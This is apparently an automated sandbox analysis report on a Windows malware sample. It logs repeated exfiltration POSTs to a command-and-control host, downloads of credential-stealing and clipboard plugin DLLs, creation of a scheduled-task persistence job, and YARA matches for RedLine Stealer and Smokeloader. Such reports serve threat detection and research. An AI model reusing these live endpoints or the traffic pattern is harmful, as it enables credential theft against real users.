Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 42 46 46 37 30 42 46 38 33 38 44 32 46 41 45 32 45 45 43 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 46 33 32 37 44 34 37 35 34 36 37 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 39 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8ABFF70BF838D2FAE2EECA3A5728455AF2739D7C43867BB42874F327D475467365FFF962A9E3C6DED93116A534FFD01283FD525849FE309
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYwMTk=Host: topgamecheats.devContent-Length: 86171Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 42 46 46 37 30 42 46 38 33 38 44 32 46 41 45 32 45 45 43 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 46 33 32 37 44 34 37 35 34 36 37 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 39 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8ABFF70BF838D2FAE2EECA3A5728455AF2739D7C43867BB42874F327D475467365FFF962A9E3C6DED93116A534FFD01283FD525849FE309
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYwMTk=Host: topgamecheats.devContent-Length: 86171Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 42 46 46 37 30 42 46 38 33 38 44 32 46 41 45 32 45 45 43 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 46 33 32 37 44 34 37 35 34 36 37 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 39 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8ABFF70BF838D2FAE2EECA3A5728455AF2739D7C43867BB42874F327D475467365FFF962A9E3C6DED93116A534FFD01283FD525849FE309
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 42 46 46 37 30 42 46 38 33 38 44 32 46 41 45 32 45 45 43 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 46 33 32 37 44 34 37 35 34 36 37 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 39 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8ABFF70BF838D2FAE2EECA3A5728455AF2739D7C43867BB42874F327D475467365FFF962A9E3C6DED93116A534FFD01283FD525849FE309
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 42 46 46 37 30 42 46 38 33 38 44 32 46 41 45 32 45 45 43 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 46 33 32 37 44 34 37 35 34 36 37 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 39 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8ABFF70BF838D2FAE2EECA3A5728455AF2739D7C43867BB42874F327D475467365FFF962A9E3C6DED93116A534FFD01283FD525849FE309
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTIwMTg=Host: topgamecheats.devContent-Length: 92170Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 42 46 46 37 30 42 46 38 33 38 44 32 46 41 45 32 45 45 43 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 46 33 32 37 44 34 37 35 34 36 37 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 39 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8ABFF70BF838D2FAE2EECA3A5728455AF2739D7C43867BB42874F327D475467365FFF962A9E3C6DED93116A534FFD01283FD525849FE309
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 42 46 46 37 30 42 46 38 33 38 44 32 46 41 45 32 45 45 43 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 46 33 32 37 44 34 37 35 34 36 37 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 39 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8ABFF70BF838D2FAE2EECA3A5728455AF2739D7C43867BB42874F327D475467365FFF962A9E3C6DED93116A534FFD01283FD525849FE309
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYwMTk=Host: topgamecheats.devContent-Length: 86171Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 42 46 46 37 30 42 46 38 33 38 44 32 46 41 45 32 45 45 43 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 46 33 32 37 44 34 37 35 34 36 37 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 39 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8ABFF70BF838D2FAE2EECA3A5728455AF2739D7C43867BB42874F327D475467365FFF962A9E3C6DED93116A534FFD01283FD525849FE309
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 42 46 46 37 30 42 46 38 33 38 44 32 46 41 45 32 45 45 43 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 46 33 32 37 44 34 37 35 34 36 37 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 39 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8ABFF70BF838D2FAE2EECA3A5728455AF2739D7C43867BB42874F327D475467365FFF962A9E3C6DED93116A534FFD01283FD525849FE309
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTE0MjY=Host: topgamecheats.devContent-Length: 91578Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 42 46 46 37 30 42 46 38 33 38 44 32 46 41 45 32 45 45 43 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 46 33 32 37 44 34 37 35 34 36 37 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 39 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8ABFF70BF838D2FAE2EECA3A5728455AF2739D7C43867BB42874F327D475467365FFF962A9E3C6DED93116A534FFD01283FD525849FE309
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 42 46 46 37 30 42 46 38 33 38 44 32 46 41 45 32 45 45 43 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 46 33 32 37 44 34 37 35 34 36 37 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 39 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8ABFF70BF838D2FAE2EECA3A5728455AF2739D7C43867BB42874F327D475467365FFF962A9E3C6DED93116A534FFD01283FD525849FE309
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODY4ODM=Host: topgamecheats.devContent-Length: 87035Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 42 46 46 37 30 42 46 38 33 38 44 32 46 41 45 32 45 45 43 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 46 33 32 37 44 34 37 35 34 36 37 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 39 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8ABFF70BF838D2FAE2EECA3A5728455AF2739D7C43867BB42874F327D475467365FFF962A9E3C6DED93116A534FFD01283FD525849FE309
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 42 46 46 37 30 42 46 38 33 38 44 32 46 41 45 32 45 45 43 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 46 33 32 37 44 34 37 35 34 36 37 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 39 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8ABFF70BF838D2FAE2EECA3A5728455AF2739D7C43867BB42874F327D475467365FFF962A9E3C6DED93116A534FFD01283FD525849FE309
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYwMTk=Host: topgamecheats.devContent-Length: 86171Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 42 46 46 37 30 42 46 38 33 38 44 32 46 41 45 32 45 45 43 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 46 33 32 37 44 34 37 35 34 36 37 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 39 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8ABFF70BF838D2FAE2EECA3A5728455AF2739D7C43867BB42874F327D475467365FFF962A9E3C6DED93116A534FFD01283FD525849FE309
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 42 46 46 37 30 42 46 38 33 38 44 32 46 41 45 32 45 45 43 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 46 33 32 37 44 34 37 35 34 36 37 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 39 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8ABFF70BF838D2FAE2EECA3A5728455AF2739D7C43867BB42874F327D475467365FFF962A9E3C6DED93116A534FFD01283FD525849FE309
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYwMTk=Host: topgamecheats.devContent-Length: 86171Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 93.123.39.96 93.123.39.96
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NET1-ASBG NET1-ASBG
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_00414770 InternetCloseHandle,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 0_2_00414770
Source: global traffic HTTP traffic detected: GET /j4Fvskd3/Plugins/cred64.dll HTTP/1.1Host: topgamecheats.dev
Source: global traffic HTTP traffic detected: GET /j4Fvskd3/Plugins/clip64.dll HTTP/1.1Host: topgamecheats.dev
Source: unknown DNS traffic detected: queries for: topgamecheats.dev
Source: unknown HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYwMTk=Host: topgamecheats.devContent-Length: 86171Cache-Control: no-cache
Source: Dctooux.exe, 0000001F.00000002.2894214163.00000000030DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4F
Source: Dctooux.exe, 0000001F.00000002.2895598813.0000000005D42000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001F.00000002.2894214163.0000000003040000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001F.00000002.2894214163.000000000306F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/Plugins/clip64.dll
Source: Dctooux.exe, 0000001F.00000002.2894214163.0000000003040000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/Plugins/clip64.dll123456789
Source: Dctooux.exe, 0000001F.00000003.2647751222.00000000030B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/Plugins/clip64.dllA
Source: Dctooux.exe, 0000001F.00000003.2647751222.00000000030B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/Plugins/clip64.dllY
Source: Dctooux.exe, 0000001F.00000002.2894214163.0000000003040000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001F.00000002.2894214163.000000000306F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/Plugins/cred64.dll
Source: Dctooux.exe, 0000001F.00000002.2894214163.0000000003040000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/Plugins/cred64.dll123456789
Source: Dctooux.exe, 0000001F.00000002.2894214163.0000000003040000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/Plugins/cred64.dllc0S
Source: Dctooux.exe, 0000001F.00000002.2894214163.0000000003040000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/Plugins/cred64.dllm0;
Source: Dctooux.exe, 0000001F.00000002.2894214163.00000000030DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/in
Source: Dctooux.exe, 0000001F.00000003.2647751222.00000000030DF000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001F.00000002.2894214163.00000000030B4000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001F.00000002.2894214163.00000000030DF000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001F.00000002.2894214163.0000000003040000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php
Source: Dctooux.exe, 0000001F.00000002.2894214163.00000000030DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php%
Source: Dctooux.exe, 0000001F.00000003.2647751222.00000000030DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php(%
Source: Dctooux.exe, 0000001F.00000002.2894214163.00000000030DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php002Recentm
Source: Dctooux.exe, 0000001F.00000002.2894214163.00000000030DB000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001F.00000002.2895598813.0000000005D42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php?scr=
Source: Dctooux.exe, 0000001F.00000002.2895598813.0000000005D22000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001F.00000002.2895598813.0000000005D42000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001F.00000002.2895197978.0000000004E7E000.00000004.00000010.00020000.00000000.sdmp, Dctooux.exe, 0000001F.00000002.2894214163.0000000003040000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php?scr=1
Source: Dctooux.exe, 0000001F.00000002.2894214163.00000000030DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php?scr=1(2SY
Source: Dctooux.exe, 0000001F.00000002.2894214163.00000000030DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php?scr=13OF
Source: Dctooux.exe, 0000001F.00000003.2647751222.00000000030B4000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001F.00000002.2894214163.00000000030B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php?scr=19m
Source: Dctooux.exe, 0000001F.00000002.2894214163.00000000030DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php?scr=1A
Source: Dctooux.exe, 0000001F.00000002.2894214163.00000000030B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php?scr=1Y
Source: Dctooux.exe, 0000001F.00000002.2894214163.00000000030DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php?scr=1e
Source: Dctooux.exe, 0000001F.00000002.2894214163.00000000030DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php?scr=1k
Source: Dctooux.exe, 0000001F.00000002.2894214163.0000000003040000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php?scr=1lle03
Source: Dctooux.exe, 0000001F.00000002.2895598813.0000000005D22000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php?scr=1on6
Source: Dctooux.exe, 0000001F.00000002.2894214163.00000000030DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.phpA
Source: Dctooux.exe, 0000001F.00000003.2647751222.00000000030DF000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001F.00000002.2894214163.00000000030DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.phpd
Source: Dctooux.exe, 0000001F.00000002.2894214163.0000000003040000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.phph8
Source: Dctooux.exe, 0000001F.00000002.2894214163.00000000030DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.phprograms
Source: Dctooux.exe, 0000001F.00000002.2894214163.00000000030DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.phps
Source: Amcache.hve.3.dr String found in binary or memory: http://upx.sf.net

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.1921606091.0000000002FA0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000016.00000002.1927120210.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000016.00000002.1927223132.00000000030A0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001F.00000002.2894078333.0000000003005000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1921437711.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000001F.00000002.2894939498.0000000004990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Contains functionality to call native functions
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_0041FE97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 0_2_0041FE97
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_0041FE97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 22_2_0041FE97
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_0041FE97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 31_2_0041FE97
Creates files inside the system directory
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe File created: C:\Windows\Tasks\Dctooux.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_00409DA0 0_2_00409DA0
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_004270F1 0_2_004270F1
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_0043B153 0_2_0043B153
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_00424113 0_2_00424113
